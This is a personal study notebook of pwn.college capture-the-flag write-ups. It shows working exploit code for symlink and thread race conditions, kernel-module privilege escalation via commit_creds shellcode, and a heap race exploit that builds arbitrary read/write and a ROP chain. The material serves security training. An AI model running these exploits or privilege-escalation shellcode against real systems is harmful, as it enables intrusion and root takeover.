ln -s /home /home/hacker/cc
ln -s /flag /home/hacker/aa/cc
#sleep 0.0005
while [ 1 ]
do
    sleep 0.0005
    mv aa bb	#change dir name
    mv cc aa	#let aa->/home
    sleep 0.0005
    
    mv aa cc #now cc -> /home, bb is dirctory
    mv bb aa #restore aa(dir)
    mv ./aa/bb ./aa/dd
    mv ./aa/cc ./aa/bb #now ./aa has bb->/flag, dd plainfile
    sleep 0.0005
    
    #restore context, for non-symlink check
    mv ./aa/bb ./aa/cc
    mv ./aa/dd ./aa/bb
done

#!/bin/bash
#持续执行challenge的shell

while [[ 1 ]]
do
    res=$(/challenge/babyrace_level5.1 /home/hacker/aa/bb | grep 'pwn')
    if [ $res ]
    then
        printf "\n$res\n\n"
        exit
    fi
done

过不了啊啊啊…

python大法+key补充

unlink: delete a name from filesystem. 真是个集合了一堆功能的系统调用, 能删文件 symlink socket FIFO device.
一些常数是用os.CONSTANT来调用的.
如果使用python的builtin function open的话, 会调用fstat ioctl这种没有什么必要的函数. 可以使用os.open来调用低级的函数.

看视频尝试python写法:

import os,sys,time
from os import symlink, unlink
if len(sys.argv) > 1:
    if sys.argv[1] == 'rm':
        os.system('rm -r $(ls | egrep -v "*py")')
        exit()
    elif sys.argv[1] == 'init' :
        os.system('rm -r $(ls | egrep -v "*py")')
        os.system('./initpy')
        exit()

while True:
    time.sleep(0.0001)
    #now dir -> 1, need to be unlinked
    unlink('./dir')
    symlink('./2', './dir')

    #now change dir to 3
    unlink('./dir')
    symlink('./3', './dir')
    time.sleep(0.00003)
    
    #now restore context
    unlink('./dir')
    symlink('./1', './dir')

initpy:

#!/bin/bash
mkdir -p ./1/aa
touch ./1/aa/bb

mkdir -p ./2
ln -s /home ./2/aa #这里还出错过.

mkdir -p ./3/aa
ln -s /flag ./3/aa/bb

ln -s /home/hacker/1 ./dir

测试:

1	`(for i in {1..1000};do /challenge/babyrace_level5.1 ./dir/aa/bb;done) \| egrep 'Error\|pwn' \| sort \| uniq -c`

结果:

    356 Error: directory not owned by root!
     44 Error: failed to get directory status!
    116 Error: failed to get file status!
    472 Error: file is a symlink!
      3 pwn.college{ojL-wiqjv9XYN-GR2XsuQ-yucpZ.QXwEDNsMTM1IzW}
or
	5218 Error: directory not owned by root!
    896 Error: failed to get directory status!
   1300 Error: failed to get file status!
   2422 Error: file is a symlink!
     19 pwn.college{ojL-wiqjv9XYN-GR2XsuQ-yucpZ.QXwEDNsMTM1IzW}

成功率最多就是20/10000, 2‰…….看视频去了, 不知道有没更好的. 太玄学了, 而且这是只是在一个4 core docker里面, 现实机器那不得更多进程+更多cpu内核+奇怪调度算法, 那是我能研究的?直接下一题, cow也是直接上大数量循环.

level6

和上一题相同, 不过dirname之后使用的是lstat, 不follow symlink……

???????????????????????????????

首先touch一个/home/hacker/a/home/b文件, 通过name和symlink验证,
然后ln两个/home/hacker/a -> /, 那么原path的dirname就是指: /home/hacker/a/home
最后再ln一个/home/hacker/a/home/b -> /flag

改版:

首先touch一个/home/hacker/1/a/home/b文件, 通过name和symlink验证,
然后ln个/home/hacker/2/a -> /, 那么原path的dirname就是指: /home/hacker/2(dir)/a/home
最后再ln一个/home/hacker/3(dir)/a/home/b -> /flag

#!/bin/bash

if [ $1 == 'init' ]
then
    cd
    mkdir -p a/home
    touch a/home/b
elif [ $1 == 2 ]
then
    cd
    mv a b
    ln -s / /home/hacker/a
elif [ $1 == 3 ]
then
    cd
    rm a ./b/home/b
    mv b a
    ln -s /flag /home/hacker/a/home/b
elif [ $1 == 'cls' ]
then
    rm -r a b 2>/dev/null
else
    echo 'invalid argument'
fi

python:

unlink symlink只要0.000035s就可以完成系统调用.

import os,sys,time
from os import symlink, unlink
if len(sys.argv) > 1:
    if sys.argv[1] == 'rm':
        os.system('rm -r $(ls | egrep -v "*py")')
        exit()
    elif sys.argv[1] == 'init' :
        os.system('rm -r $(ls | egrep -v "*py")')
        os.system('./initpy')
        exit()

while True:
    time.sleep(0.0001)
    #now dir -> 1, need to be unlinked
    unlink('./dir')
    symlink('./2', './dir')

    #now change dir to 3
    unlink('./dir')
    symlink('./3', './dir')
    time.sleep(0.00003)
    
    #now restore context
    unlink('./dir')
    symlink('./1', './dir')

initpy:

#!/bin/bash
mkdir -p ./1/a/home
touch ./1/a/home/b

mkdir -p ./2
ln -s / ./2/a

mkdir -p ./3/a/home
ln -s /flag ./3/a/home/b

ln -s /home/hacker/1 ./dir

./dir/a/home/b

测试:

1 2	`(for i in {1..20000};do /challenge/babyrace_level6.1 ./dir/a/home/b;done) \ \| egrep 'Error\|pwn' \| sort \| uniq -c`

成功率降到了20/20000, 变成千分之一了……..

level7

保护全开. 做不出来, 去看了看.0程序的race point在哪里.

没看懂. 噢, 我在discord上面看到了提示!!! 才想起来视频里有提到signal, 而且这次也有signal handler.

一开始还在想这岂不是要等十分钟, 然后突然想起来有系统调用可以给其他进程发送信号.

而且程序中的timeout_handler也只是执行logout而已. 这样race point就很明显了, 只要一次成功就可以了.

    else if ( !strcmp(s1, "win_authed") )
    {
      if ( privilege_level )
      {
//就是这里--------------------------------------------------------
        if ( privilege_level == 1 )
          puts("Your privilege level is too low!");
        else
          win();
      }
      else
      {
        puts("You are not logged in!");
      }}

有一个kill系统调用, ~~要知道pid参数的话那还是直接用pwntools启动, 不知道python的sendline耗时如何….~~算了不用了

总之命令行里启动challenge, 永真循环里echo login和win_authed两条命令, 即login\nwin_authed\n.
然后命令行永真循环, 不停kill pid 14.

非常直接, 成功率也是非常的低:

1
2
3

while true;do kill -s 14 465;done
(while true;do printf 'login\nwin_authed\n';done)|/challenge/babyrace_level7.1|grep 'pwn'
ps aux

level8

调试可以使用practice mode中的sudo gdb, 或者使用pwntools以非set_uid启动程序.
- info thread + thread [num]
- 第一个hit breadpoint的线程会停下来, gdb还会切换到那个线程上.
ps auxH 显示线程.
看了几眼python上的concurrent.futures
- 都在下面了. 主要就是processExecutor, 参数是上限, 形象成一个pool(进程池)可以根据需要使用.

ELF Handling For TLS | 哪位神的TLS variable文章 | 看起来不错的教程
上面是有关程序中使用的fs来定位线程私有变量的原理.

每个线程有自己的空间, 但是privilege_level是全局的. 使用pwntools开两个连接, 和上一题一样的做法.

成功率2/10000=0.2‰

import concurrent.futures
import pwn

pwn.context.update(encoding='latin')

process = pwn.process('/challenge/babyrace_level8.1')

def work(cmd):
    with pwn.remote('localhost', 1337) as remote:
        pwn.info(remote.recvline().decode())
        remote.send(f'{cmd} ' * 10000)
        pwn.info(remote.clean().decode())

with concurrent.futures.ProcessPoolExecutor(3) as pool:
    future = []
    future.append(pool.submit(work, 'login'))
    future.append(pool.submit(work, 'logout'))
    future.append(pool.submit(work, 'win_authed'))
    concurrent.futures.wait(future)

level9

看到个新模块psutil.

执行send_redacted_flag命令时, 向函数栈帧中的的缓冲区写入”REDACTED: “, terminated with null-byte, which is 11bytes long(plus null-byte). Then calling open->read to read flag into the buffer, right after the previous string’s null-byte.

if now try to use command receive_message to print out string containing the flag, the function will stop at 11th position, because write() function’s n argment is given by strlen() that evaluating string in global_message.

so the the procedure is as follows:

In one thread(connection), first send send_redacted_flag command.
Between this and next command, another thread send send_message command, overwrite until the global_message’s 11th char, before assigning null-byte to the end of string.
and first thread now continue executing at receive_message command. after the strlen() function, the return value means 11+[flag’s len], then used in the argment of write().

how to write script….

two connections. one sends send_redacted_flag -> receive_message sequence, another sends send_message with 'whatthefuckisthat' continuously(or separated by space in a longlonglong bytestring).

import concurrent.futures
import pwn

process = pwn.process('./babyrace_level9.1')

def work(cmd):
    with pwn.remote('localhost', 1337) as remote:
        pwn.info(remote.recvline().decode())
        remote.send(f'{cmd} ' * 10000)
        pwn.info(remote.clean().decode())

with concurrent.futures.ProcessPoolExecutor(3) as pool:
    thread = []
    thread.append(pool.submit(work, 'send_redacted_flag receive_message'))
    thread.append(pool.submit(work, 'send_message whatthefuck'))
    concurrent.futures.wait(thread)

something interesting happen….

9999     Message: 
   1 [*] Message: 
   1     Message: REDAChED: \isthatandthis\at the fuck? this is true flag}
   1     Message: REDAChefuckisthatandthis\at the fuck? this is true flag}
 504     Message: REDACTED: [*] Function (send_message/send_redacted_flag/receive_message/quit): 
5444     Message: REDACTED: \isthatandthis\at the fuck? this is true flag}
   1     Message: REDACTefu \isthatandthis\at the fuck? this is true flag}
   1     Message: whatCTEfuckisthatandthis\at the fuck? this is true flag}
   1     Message: whattheD: \isthatandthis\at the fuck? this is true flag}
   1     Message: whatthef: \isthatandthis\at the fuck? this is true flag}
  18     Message: whatthefuc[*] Function (send_message/send_redacted_flag/receive_message/quit): 
   1     Message: whatthefuc\isthatandthis\at the fuck? this is true flag}
4027     Message: whatthefuckisthatandthis\at the fuck? this is true flag}

   1     Message: whatthefuckisn.ctalege{what the fuck? this is true flag}

by patching the program, something strange happened….. how does line 11 occur….? can write syscall to be interrupted and then reenter?

anyway, that’s the way it is.

level10

global_message with semaphore: sem_wait() + sem_post()……………

我又不会了…… 做这个真是违反直觉的思考. scp了.0程序, 希望能看出一点提示..没看出来.

level11

没看出和上一题有什么区别. 不过在discord上面看到了一点东西.

10, 11 have semaphores on broadcast, 11 has a printf instead of strlen-read

dicord上面都用的是sigpipe. 这个会调用pthread_exit()函数.

.0程序停在了message赋值的每一次循环, 这个时候可以发送sigpipe直接结束线程, 这样sem_post不会执行, global_message_mutex也不再可用, 意味着没有线程能够再进入critical section.

Or not consuming input so the writes to the socket block at the right time

不知道这能不能行. 这只能在send_message停下.

processes are as follows:

one connection sends send_redacted_flag command, then completes the str copy.
another or still the same connection sends send_message command with whatthefuckisthis, causing overlapping the null-byte between prompt and flag. after null-byte, before last byte, sending SIGPIPE to stop thread.
another connection send receive_message.
every program run can only test once.

succeeding in .0 practice.

module D-kernel

key point:

Intro:

linux syscall DETAILS (linux inside) | linux_kernel_doc | syscall instruction | Attributes of Variables(gcc) |
- you cannot find noderef or address_space in the GCC docs because they are not GCC attributes. They have meaning only for Sparse.
  about the effect.
Modern solution to Rings: Ring -1, Hypervisor Mode. Able to intercept sensitive Ring 0 actions done by guests and handle them in the host OS.
syscall High-level overview:
1. At bootup, in Ring 0, the kernel sets MSR_LSTAR to point to the syscall handler routine.
2. When a userspace (Ring 3) process wants to interact with the kernel, it car call syscall.
  a. Privilege level switches to Ring 0.
  b. Control flow jumps to value of MSR_LSTAR.
  c. Return address saved to rcx.
  d. That’s basically it! https://www.felixcloutier.com/x86/syscall
3. When the kernel is ready to return to userspace, it calls the appropriate return instruction (i.e., sysret for syscall).
  a. Privilege level switches to Ring 3.
  b. Control flow jumps to rcx.
  c. That’s basically it!
4. x86-64: rdi rsi rdx r10 r8 r9 -
  We can see the 6 args are stored in these registers. rcx is used to store syscall return address, so args skip rcx.
exploit dirctions:
- From the network: remotely-trigged exploits (packets of death, etc). Rare!
- From userspace: vulnerabilities in syscall and ioctl handlers (i.e., launched from inside a sandbox!)
- From devices

kernel module

lsmod list kernel module. like device drivers(graphic card), filesystems, networking functionality, other stuff.
all with .ko extension.

How to interact with kernel module for further exploitation?

historically, kernel modules could add syscall entries. nowadays less used.
interrupts. a module could register a interrupt handler to hook. int3 and int1 are one-byte interrupt instructions which may be useful.
files.
- /dev: mostly traditional devices (i.e., /dev/dsp for audio)
1. /proc: started out in System V Unix as information about running processes. Linux expanded it into in a disastrous mess of kernel interfaces.
- /sys: non-process information interface with the kernel.
- A module can register a file in one of the above locations.
  Userspace code can read || open() that file to interact with the module!
  or ioctl() function sends setting and querying non-stream data(i.e., webcam resolution settings as opposed to webcam video stream).

driver interaction:

reads data from userspace (using copy_from_user, a kernel API)
“does stuff” (open files, read files, interact with hardware, etc)
writes data to userspace (using copy_to_user)
returns to userspace

kernel module: kernel doc

compilation:
- kernel modules are all listed in the pwnkernel/src/
- at the end of the build.sh, there is a building modules procedure. it calls Make makefile in src dirctory then copys .ko file to fs directory being mounted at /home/ctf.
- so before compilation, adding an entry to makefile for newly added module.
command: must be used under root. Or sh not found.
- insmod command: load kernel module. or through init_module system call.
- lsmod : list all modules.
- rmmod : remove module.
testing module:
- hello_log.ko: just print something to kernel ring buffer.
- hello_dev_char.ko: register a character device. may use head, dd(with option like: if=/dev/pwn-college-char of=/proc/self/fd/1 bs=128 count=1) , etc, to read from it.
- hello_ioctl: exposes a /dev device with ioctl interface
- hello_proc_char: exposes a /proc device
- make_root: exposes a /proc device with ioctl interface and an evil backdoor!

Privilege Escalation

SLIDE. in make_root.c.

Escape Seccomp

SLIDE

mainly disable TIF_SECCOMP bit. all in SLIDES.

struct task_struct {
    // LOTS of stuff, including
    const struct cred __rcu *cred;
    struct thread_info thread_info;
}
struct thread_info {
    unsigned long flags;	/* low level flags */
    u32 status;		/* thread synchronous flags */
};

Yan demonstrates how to use make_root.ko to escape seccomp and escalating privilege.

memory managment

linux use four level page table:

only lower 48 bits are used in addressing. higher 12bits used to denote the kernel space. and ARM arch take these bits as tag for security concerns. android source | LLVM memory tagging |
Virtual Machine isolation: The extended page table.
MMU + TLB
other architectures are analogous in paging. Linux requires a hardware MMU (although certain forks do not).
The Old Way: Old Linuxes could access physical memory via /dev/mem as root.
The New Way: If you want to get at physical memory now, you must do it from the kernel. Physical memory is mapped contiguously in kernel’s virtual memory space for convenient access. Two macros, phys_to_virt() and virt_to_phys().

Mitigations

SLIDES many links.

Stack canaries: leak the canary!
kASLR: leak the kernel base address!
Heap/stack regions NX: ROP!
May support Function Granular ASLR.
Supervisor Memory Protection:
- SMEP.
  Prevents kernel-space code from Executing userspace memory at all ever.
- SMAP.
  Prevents kernel-space from even Accessing userspace memory unless the AC flag in the RFLAGS register is set. Two ring0 instructions, stac and clac, manage this bit.
- Why separate these? in SLIDES.

kernel shellcode

you cant use syscalls in kernel. just use call instruction with symbol addresses in /proc/kallsyms
KASLR. if it is on, then I need to find a vulnerability to leak an kernel symbol address.
indirect calls.
seccomp escaping: notice gs segment register to figure out where the task struct is.
The kernel is WAY too complex to figure out offsets manually.
Best option:
1. Write a kernel module in C with the actions you want
  your shellcode to do.
2. Build it for the kernel you want to attack (e.g., using
  the vm build command in pwn.college).
3. Reverse-engineer it to see how these actions work in
  assembly.
4. Re-implement that assembly in your shellcode!
be careful with kernel code context! Try to have it act like a normal function and return when it’s done.

Env setup

build for old kernel 5.4: set up an environment

first complie stopping at thunk_64.o, due to missing symbol table.
- revise linux-5.4/tools/objtool/elf.c line 380 -> link
then revise build.sh and take a vm snapshot.
then revise arch/x86/boot/compressed/pgtable_64.c to fix multiple definitions of __force_order. link
OK. total size is 4.3G. by du -sh pwnkernel

VM by qemu:

require: new version of gdb, kernel with debug symbols, ASLR is off(in ./launch there is -append option for qemu, check its usage).
because the kernel is started with qemu, so can debug with gdb through port 1234.

gdb linux-5.4/vmlinux + target remote :1234 (I added it into .gdbinit in pwnkernel/)
cat /proc/kallsyms you can see all symbols in kernel. because we disabled the kernel address space randomization, it will always be the same.
only a limited number of commands will work in vm. look ls /bin for details. Because the shell is provided by busybox, so there is a lack of functionality.
use sh -l or su - ctf to load ~/.profile. there is some convenient aliases.

further setup is here

tips:

wget command in build.sh has been added with -c option(–continue), which means that it won’t repeat downloadiing when there is an already existing file in the same directory.
mkdir -p no error if existing.

online environment

vm debug: I have no idea about what happened…….it suddenly worked and then shutdown…..
太蠢了, 全都停不下来. 等会看一下writing kernel shellcode. 没用啊, 难不成全部都变成本地做? 也不是不行就是了…….
只是不能debug. 暂未发现解决办法.

level1

.0 level calls printk() function to give some info in kernel ring buffer. Obviously, .1 level doesn’t.

tested in ipython:

import os
fd = os.open('/proc/pwncollege', os.O_RDWR)
os.write(fd, 'password')
os.read(fd, 60)

level2

unlike previous level, there is no device_read() function, rather printk(flag) exists in device_write with password check.

script is the same way.

level3

the kernel module defines a win() function which will elevate the calling process privilege.

once pass the check, current process(i.e., ipython), will run as root. then use !cat /flag. everything is done.

even while the password is for previous level, it just still works……..

level4

hijack the kernel module by ioctl(). it is in python fcntl module. doc

in python fcntl.fcntl() almost equals to fcntl.ioctl(), except for ioctol’s arg argument can accept bytes.

script:

import fcntl, os
fd = os.open('/proc/pwncollege', os.O_RDWR)
fcntl.ioctl(fd, 1337, b'ruysmamctudpofzh')
#then !cat /flag

level5

device_ioctl() calls __x86_indirect_thunk_rbx.

retpoline, __x86_indirect_thunk_rbx……what’re these?

here it is(here is repoline and google’s article). when debugging, I find that it just merely jumps to the address the register(rbx) points to. so many nested macros in kernel code…..

ATTENTION: The following piece of code in fact create a function, and in kernel module it calls the it. Thus module will push return address onto stack and when returning from the THUNK function it’ll come back to complete the rest of cleanups.

GENERATE_THUNK(_ASM_BX)
↘
#define __EXPORT_THUNK(sym) _ASM_NOKPROBE(sym); EXPORT_SYMBOL(sym)
#define EXPORT_THUNK(reg) __EXPORT_THUNK(__x86_indirect_thunk_ ## reg)
#define GENERATE_THUNK(reg) THUNK reg ; EXPORT_THUNK(reg)
↘
.macro THUNK reg
	.section .text.__x86.indirect_thunk

ENTRY(__x86_indirect_thunk_\reg)
	CFI_STARTPROC
	JMP_NOSPEC %\reg	  #simply a jmp to shellcode. no change to the stack. 
						#we can directly use ret to come back to module code.
	CFI_ENDPROC
ENDPROC(__x86_indirect_thunk_\reg)
.endm

what value dose the rbx hold before execute jmp rbx instruction? it is ioctl()’s arg argument.

by cat /proc/kallsyms | grep win command, the win()’s address can be easily found. ffffffffc0000c5d t win [challenge]

but in pwn.college….

let’s give up this mysterious environment.

Now I know why it would happen……
normal user that doesn’t have enough privilege will find all kernel symbols with address 0.
then what should i do in pwn.college? emmmmmm
maybe i need to grep in practice mode and come back.

script:

#include <stddef.h>
#include <fcntl.h>
#include <sys/ioctl.h>
int main(){
    int fd = open("/proc/pwncollege", 2);
    ioctl(fd, 1337, 0xffffffffc0000c5d);
    //after privilege escalation
    int fd2 = open("/flag", 2);
    sendfile(1, fd2, NULL, 60);
}

I win.

level6

begin kernel shellcoding!

at the beginning of module, it calls kmalloc() function to allocate a chunk of virtual address contiguous memory. the details of its argument are waiting to be check.
when writing to /proc/pwncollege, the device_write() in kernel will call copy_from_user() to copy shellcode from write()‘s buffer argument to shellcode variable. and jmp to shellcode address.
donot forget to restore kernel’s context after shellcode returns.

The ciritical point of shellcoding in kernel is we can only call kernel function. here i use prepare_kernel_cred() and commit_cred() to achive privilege escalation.

two functions’ address:

1
2
3

$ cat /proc/kallsyms | grep -E 'prepare_kernel_cred|commit_cred'
ffffffff810892c0 T commit_creds                                   
ffffffff810895e0 T prepare_kernel_cred

then commit_cred(prepare_kernel_cred(0))

reassembly code:

call    _copy_from_user ; PIC mode
mov     rbp, rax
mov     rax, cs:shellcode
call    __x86_indirect_thunk_rax ; PIC mode

mov     rax, rbx
pop     rbx
sub     rax, rbp
pop     rbp
retn

what would happen if device_write() return non-zero? first try to non-restore:

shellcode = '''
	xor edi, edi
	mov rbx, 0xffffffff810895e0
	call rbx
	mov rdi, rax
	mov rbx, 0xffffffff810892c0
	call rbx
	ret	//equals to the ret in device_write()
'''

The ret instruction equals to the ret in device_write(), and violate the conventions of caller-saved resgiter–rbx. it may crash the kernel. but in practice, it doesn’t.

script:

#include <stddef.h>
#include <fcntl.h>
#include <sys/ioctl.h>
//gernerated with pwnsh
char *shellcode="\x31\xff\x48\xc7\xc3\xe0\x95\x08\x81\xff\xd3\x48\x89\xc7\x48\xc7\xc3\xc0\x92\x08\x81\xff\xd3\xc3";
int main(){
    int fd = open("/proc/pwncollege", 2);
    write(fd, shellcode, 0x1000);
    int fd2 = open("/flag", 60);
    sendfile(1, fd2, NULL, 60);
}

win again.

~ $ ./test                                                                                                        
[ 2166.732101] [device_open] inode=ffff888006e33448, file=ffff888006bf7900                                        
[ 2166.737393] [device_write] file=ffff888006bf7900, buffer=0000000000481004, length=4096, offset=ffffc900001a7f08
pwn_college{what the fuck?}                                                                                       
[ 2166.748112] [device_release] inode=ffff888006e33448, file=ffff888006bf7900

level7

execute shellcode through ioctl

after checking the code for a while, I found that it may need to define a struct to wrap up the arg for ioctl().

__int64 __fastcall device_ioctl(file *file, unsigned int cmd, char *arg)
{
  __int64 result; // rax
  size_t shellcode_length; // [rsp+0h] [rbp-28h] BYREF
  void (*shellcode_execute_addr)(void); // [rsp+8h] [rbp-20h] BYREF
  unsigned __int64 v7; // [rsp+10h] [rbp-18h]

  v7 = __readgsqword(0x28u); //for canary
  printk(&unk_A30, file, cmd); //nothing
  result = -1LL;
  if ( cmd == 1337 ) //request number must be 1337
  {
    copy_from_user(&shellcode_length, arg, 8LL);
    copy_from_user(&shellcode_execute_addr, arg + 4104, 8LL);
    //the shellcode_length and addr come from the (void*)arg.
    //the maximun len of code is 4104 bytes.
    result = -2LL;
    if ( shellcode_length <= 0x1000 )
    {
      copy_from_user(shellcode, arg + 8, shellcode_length);	//copy shellcode.On success will return 0
      _x86_indirect_thunk_rax(shellcode_execute_addr);// jumpto shellcode.
      result = 0LL;
    }
  }
  return result;
}

the struct may be like:

struct anonym{
    long len = 200;
    char a[4104];
    void* addr = ?;
}test;

code near jmp:

mov     rdi, cs:shellcode
lea     rsi, [arg+8]
call    _copy_from_user ; PIC mode
mov     rax, [rsp+28h+shellcode_execute_addr]
call    __x86_indirect_thunk_rax ; PIC mode
xor     eax, eax

~~so i can reuse the rdi as the shellcode address.~~. emmmmm, use gdb.

1 2	`~ $ cat /proc/kallsyms \| grep 'device_ioctl' 0xffffffffc000092c t device_ioctl [challenge]`

and the kmalloc() address……

► 0xffffffffc00009ac    call   _copy_from_user            <_copy_from_user>
       rdi: 0xffffc90000045000 ◂— 0xffffffffffffffff                       
       rsi: 0x4ae388 ◂— 0                                                  
       rdx: 0x0

shellcode is same like previous level.

script:

#include <stddef.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <string.h>
char *shellcode="\x31\xff\x48\xc7\xc3\xe0\x95\x08\x81\xff\xd3\x48\x89\xc7\x48\xc7\xc3\xc0\x92\x08\x81\xff\xd3\xc3\x00";
int shellcode_len = 25;
struct anonym{
    long len;
    char a[4096];
    void* addr /* =? */;
}test;

int main(){
    test.len= shellcode_len;
    test.addr = (void*)0xffffc9000002f000;
    memcpy(test.a, shellcode, shellcode_len);
    int fd = open("/proc/pwncollege", 2);
    ioctl(fd, 1337, &test);
    //after privilege escalation
    int fd2 = open("/flag", 60);
    sendfile(1, fd2, NULL, 60);
}

still win. but through a stupid way to find kmalloc()’s fixed address…..

level8

this challenge has two files. One for kernel module, the other for user land program to receive shellcode and add seccomp rules to itself(only write syscall is allowed).

nothing special.

level9

something strange in IDA…

Okay, just because the misdecompilation of memset(v8, 0, 66). in mechine code it is rep stod with rcx=66 rdi=dest rax=content. and it need modify the struct name in Structures window.

we should fill with this structure, and overwrite the function pointer:

00000000 logggg          struc ; (sizeof=0x108, align=0x8, copyof_570)
00000000                                         ; XREF: device_write/r
00000000 buffer          db 256 dup(?)
00000100 log_function    dq ?                    ; XREF: device_write+4A/w
00000100                                         ; device_write:loc_661/r ; offset
00000108 logggg          ends
00000108

256 bytes shellcode and 8 bytes shellcode begin address.

ATTENTION:
1
call    __x86_indirect_thunk_rax ; PIC mode
this is a call instruction, so there is no need for fixing stack context in shellcode. Just simply add ret at the end of it is enough.

this module has local variable space on stack(and canary), so we can use the rdi to restore the stack context and make ret work normally.

//shellcode is also the same.
#include <stddef.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <string.h>
char *shellcode="...";
int len = 264;
struct anonym{
    char buf[256];
    void* addr /* =? */;
}test;

int main(){
    memcpy(test.buf, shellcode, 256);
    test.addr = (void*)...;
    int fd = open("/proc/pwncollege", 2);
    write(fd, &test, 264);
    //after privilege escalation
    int fd2 = open("/flag", 60);
    sendfile(1, fd2, NULL, 60);
}

level10

I cannot figure out the difference between this and previous level…..

level11

have user land program with seccomp constraint(write).

and the pwncollege proc cannt be read by user:hacker. we can use write to do privilege escalation.

level12

first fork a child to read the flag into bss segment, then delete the flag.
Next read shellcode which can only use write syscall.
the shellcode use write() to communicate with pwncollege kernel module for privilege escalation purpose.
then use write() to print out the bss segment content.

module E-advance

key point:

Core concept: security checks that do not properly use mutexes are ineffective in a multithreaded environment!
keeps track of what do you know about the process and the program, what do you need to know, what you can do.
Problem: we lack knowledge of:
- PIE base (binary address)
- ASLR base (library addresses)
- Stack base
- Heap base
- Canary
may be a plan:
1. Leak address of tcache_perthread_struct.
2. Compute address of pointer to main_arena.
3. Leak address of main_arena in libc’s BSS.
4. Compute libc base address.
5. Compute a thread stack address.
6. Leak the canary and overflow the stack or Overwrite the return address with a ropchain!
first: heap base, via tcache poisoning.
- use race condition showed in the vedio, interleave free with write.
When previous work is done, we get one address in per thread tcache memory. then by gdb it we can find the main_areana pointer in the same memory region. Then we have all threads heap metadata+libc base address.
Exploit Primitives:
- the building block of complex exploitation:
  arbitrary read, arbitrary write, arbitrary call. or controlled ones.
- the slides demonstrate an exp example of multithread message storing service.
- use wrapped code for reuse intention.
- some gotchas:
  - corrupted heap metadata: start a new connection
  - burned bridges(pointer to not a valid heap chunk): avoid newly non-viable code paths.
kernel race:
- syscalls, file access, interrupts can be triggered simultaneously.
- prevention and recent situation in SLIDES

Pivoting Around Memory

four major parts:
- The program itself
- The stack
- libc
- The heap
Stack from libc: __libc_argv or environ
- the environ variable is just a pointer to the env on stack set up by the _start() function(maybe).
  and the setenv() funtion allocates a chunk on heap for the new string. this function also copies all env strings’ pointer(to stack) to the heap, and add new env pointer to the end of it.lsdfk
- the setenv() copies the string, and the putenv() refers it.
libc from binary: reading GOT entries
Program base from libc: pivoting through ld
- libc always contains pointers into ld for runtime symbol resolution (in the form of the _dl_runtime_resolve libc GOT entry)
- ld is also practically guaranteed to be at a constant offset from libc
- Either way, once the address of ld has been leaked, the name field of the global _dl_rtld_libname struct holds a pointer into the .interp section of the main binary

e.g.

import time
import pwn
import os

def leak_perthread_addr(r1,r2):
    if os.fork() =0:
        for _ in range(10000):
            #这个AAABBB也是细节, 让我纠结到半夜一点多的罪魁祸首.
            r1.sendline("malloc 0 scanf 0 AAAAAAAABBBBBBBB free 0")
        os.kill(os.getpid()，9)
    for _ in range(10000):
        r2.sendline("printf 0")
    os.wait()
    output = r2.clean()
    r1.clean()
    leak = pwn.u64(next(a for a in output.split() if b'\x7f' in a)[8:].ljust(8，b'\0'))
    return leak

idx = 1
#just as the name, malloc a chunk at the specific address.
def controlled_allocation(r1,r2,addr):
    global idx
    r1.clean()
    r2.clean()
    
    packed =pwn.p64(addr)
    r1.sendline(f"malloc {idx+1}")
    while True:
        if os.fork()==0:
            r1.sendline(f"free {idx}")
            os.kill(os.getpid(),9)
		r2.send((b"scanf %d "%idx + packed + b"\n")*2000)
         os.wait()
         time.sleep(0.1)
         #use printf command to check whether the race is win(@packed == content printed out).
         r1.sendline(f"malloc {idx} printf {idx}")
         r1.readuntil("MESSAGE:")
         stored = r1.readline()[:-1]
         #there maybe an \0 in the address code. if the condition is true, it means the race succeeds.
		if stored == packed.split(b'\0')[0]:
         	break
	r1.sendline(f"malloc {idx+1}")
	r1.clean()
	idx += 2

def arbitrary_read(r1,r2,addr):
    controlled_allocation(r1,r2,addr)
	r1.sendline(f"printf {idx-1}")
    r1.readuntil("MESSAGE:")
    output = r1.readline()[:-1]
    leak = pwn.u64(output[:8].ljust(8， b'\0'))
    return leak

def arbitrary_write(r1,，r2，addr , value):
    controlled_allocation(r1,r2,addr)
    r1.send(b"scanf %d "%(idx-1) + value + b"\n")

try:
    p.kill()
except Exception:
    pass

p=pwn.process( "./ult")
#pwn.gdb.attach(p, "continue\n")
#time.sleep(1)
print(open(f"/proc/{p.pid}/naps" ).read())
r1 =pwn.remote("localhost",1337)
r2 =pwn.remote("localhost",1337)
r3 =pwn.remote("localhost",1337)

perthread_leak = leak_perthread_addr(r1,r2);
print("LEAKED: PERTHREAD: ", hex(perthread_leak))
main_arena_ptr_address = perthread_leak - 0x8d0 + 0x890
print("CONPUTED: MAIN_ARENA_PTR: " , hex(main_arena_ptr_address))
main_arena_address = arbitrary_read(r1，r2, main_arena_ptr_address)
print("LEAKED: MAIN_ARENA: ",hex(nain_arena_address))
libc_base = main_arena_address - 0x1ebb80
print("COMPUTED: LIBC_BASE: ", hex(libc_base))
#this is the return address of vuln in thread. thus the *stored* rip.
stored_rip_address = libc_base - 0x4138
print("COMPUTED: STORED_RIP_ADDRESS:", hex(stored_rip_address))
addr_in_binary = arbitrary_read(r1，r2,stored_rip_address)
print("LEAKED: ADDR IN BINARY:", hex(addr_in_binary))
bin_base = addr_in_binary - 0x172f
print("COMPUTED: BINARY BASE: ", hex(bin_base))

print("!!!!!! LET'S ROLLING !!!!!!")
#new technique
libc = p.elf.libc
libc.address = libc_base
pwn.context.arch = 'amd64'
rop = pwn.ROP(libc, badchars=b"\x09\x0a\x0b\xoc\xod\xoe\x20")
rop.call( "close",[3]) 	# used for correctly execute sendfile.
rop.call( "read"，[0,libc.bss(0x123)，42])
rop.call( "open", [libc.bss(0x123)，0])
rop.call( "sendfile"，[1，3，0，1024])
rop.call( "exit",[42])

arbitrary_write(r1，r2，stored_rip_address, rop.chain())
r1.sendline( "quit")
p.send( "/flag\0")
print( "LEAKED:", p.readall())
print("EXITED: ", p.poll())

finally, i come to the last module level.

level1

emmmmmm, i thought i have to write the script above by my own hand.

failed to test the above program in kali2021, maybe the source code of tache is changed.

Ohhhhhh, i forget the thread local var is in high address space, so the tcache contains ‘\x7f’.

we can get the constant offset of libc and thread tcache address(0x7f44ac0008d0):

#print the content of the chunk.
pwndbg> x/4gx 0x7f44ac000f20
0x7f44ac000f20: 0x00000007f44ac000      0x00007f44ac0008d0
0x7f44ac000f30: 0x0000000000000000      0x0000000000000000

